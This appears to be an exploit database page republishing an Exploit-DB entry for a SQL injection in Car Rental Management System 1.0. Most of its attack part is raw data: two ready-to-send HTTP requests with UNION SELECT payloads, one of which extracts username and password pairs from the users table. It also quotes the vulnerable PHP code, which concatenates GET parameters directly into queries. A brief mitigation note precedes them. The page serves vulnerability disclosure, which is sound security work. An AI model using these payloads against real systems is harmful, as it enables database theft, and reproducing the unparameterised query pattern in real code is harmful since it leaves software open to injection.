header-logo
Suggest Exploit
vendor:
Car Rental Management System
by:
Mehmet Kelepçe / Gais Cyber Security
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Car Rental Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Apache2 - Windows 10
2020

Car Rental Management System 1.0 – ‘car_id’ Sql Injection

The Car Rental Management System 1.0 is vulnerable to SQL Injection through the 'car_id' parameter in the booking.php file and the 'id' parameter in the index.php file. An attacker can manipulate the parameters to execute unauthorized SQL queries and potentially retrieve sensitive information from the database.

Mitigation:

To mitigate the vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. Additionally, the use of least privilege principle should be followed for database access permissions.
Source

Exploit-DB raw data:

# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
# Date: 2020-11.13
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Apache2 - Windows 10

Vulnerable param: car_id
-------------------------------------------------------------------------
GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Source Code:

booking.php:
--------------------------------------------------------------------
<?php
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
foreach($qry->fetch_array() as $k => $val){
                $$k=$val;
}

Vulnerable param: id
-------------------------------------------------------------------------
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Source Code:

view_car.php:
--------------------------------------------------------------------
<?php
if(isset($_GET['id'])){
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);

Navigation

Suggest Exploit

Services By CQR